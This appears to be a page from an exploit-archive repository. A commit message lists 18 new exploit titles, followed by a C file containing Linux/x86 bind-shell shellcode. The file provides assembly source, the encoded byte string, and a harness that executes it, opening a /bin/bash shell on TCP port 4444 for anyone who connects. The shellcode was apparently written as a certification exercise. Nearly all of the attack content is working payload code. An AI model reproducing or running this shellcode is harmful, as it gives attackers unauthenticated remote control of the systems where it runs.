fa261f0558
18 changes to exploits/shellcodes Spotify 1.0.96.181 - 'Proxy configuration' Denial of Service (PoC) NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC) NTPsec 1.1.2 - 'ntp_control' Out-of-Bounds Read (PoC) NTPsec 1.1.2 - 'ntp_control' Authenticated NULL Pointer Dereference (PoC) NTPsec 1.1.2 - 'config' Authenticated Out-of-Bounds Write Denial of Service (PoC) Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free Microsoft Windows 10 - 'RestrictedErrorInfo' Unmarshal Section Handle Use-After-Free Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit) FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure Roxy Fileman 1.4.5 - Arbitrary File Download doorGets CMS 7.0 - Arbitrary File Download ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
94 lines
No EOL
1.7 KiB
C
94 lines
No EOL
1.7 KiB
C
/*
|
|
; Title : Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (100 bytes)
|
|
; Date : Jan, 2019
|
|
; Author : Joao Batista
|
|
; Website : overflw.wordpress.com
|
|
; Twitter : @x42x42x42x42
|
|
; SLAE-ID : 1420
|
|
; Tested on : i686 GNU/Linux
|
|
|
|
global _start
|
|
|
|
section .text
|
|
_start:
|
|
xor eax,eax
|
|
xor ebx,ebx
|
|
|
|
; socket
|
|
push ebx
|
|
inc ebx
|
|
push ebx
|
|
push 0x2
|
|
mov ecx,esp
|
|
mov al,0x66
|
|
int 0x80
|
|
|
|
; bind
|
|
xchg edi,eax
|
|
xor eax,eax
|
|
inc ebx
|
|
push eax
|
|
push word 0x5c11 ; port=4444
|
|
push bx
|
|
mov ecx, esp
|
|
push 0x10
|
|
push ecx
|
|
push edi
|
|
mov ecx,esp
|
|
mov al,0x66
|
|
int 0x80
|
|
|
|
; listen
|
|
push eax
|
|
push edi
|
|
mov ecx,esp
|
|
mov al,0x66
|
|
add ebx,2
|
|
int 0x80
|
|
|
|
;accept
|
|
push eax
|
|
push eax
|
|
push edi
|
|
mov ecx,esp
|
|
add al,0x66
|
|
inc ebx
|
|
int 0x80
|
|
|
|
;dup2
|
|
xchg ebx,eax
|
|
xor eax,eax
|
|
xor ecx,ecx
|
|
mov cl,0x2
|
|
|
|
loop:
|
|
mov al,0x3f
|
|
int 0x80
|
|
dec ecx
|
|
jns loop
|
|
|
|
;execve(/bin/sh)
|
|
push eax
|
|
push word 0x6873 ; hs
|
|
push 0x61622f2f ; ab//
|
|
push 0x6e69622f ; nib/
|
|
mov ebx,esp
|
|
push eax
|
|
mov edx,esp
|
|
push ebx
|
|
mov ecx,esp
|
|
mov al,0xb
|
|
int 0x80
|
|
*/
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char shellcode[] = \
|
|
"\x31\xc0\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x97\x31\xc0\x43\x50\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xb0\x66\xcd\x80\x50\x57\x89\xe1\xb0\x66\x83\xc3\x02\xcd\x80\x50\x50\x57\x89\xe1\x04\x66\x43\xcd\x80\x93\x31\xc0\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x66\x68\x73\x68\x68\x2f\x2f\x62\x61\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
|
|
|
|
main()
|
|
{
|
|
printf("shellcode length: %d\n", strlen(shellcode));
|
|
int (*ret)() = (int(*)())shellcode;
|
|
ret();
|
|
} |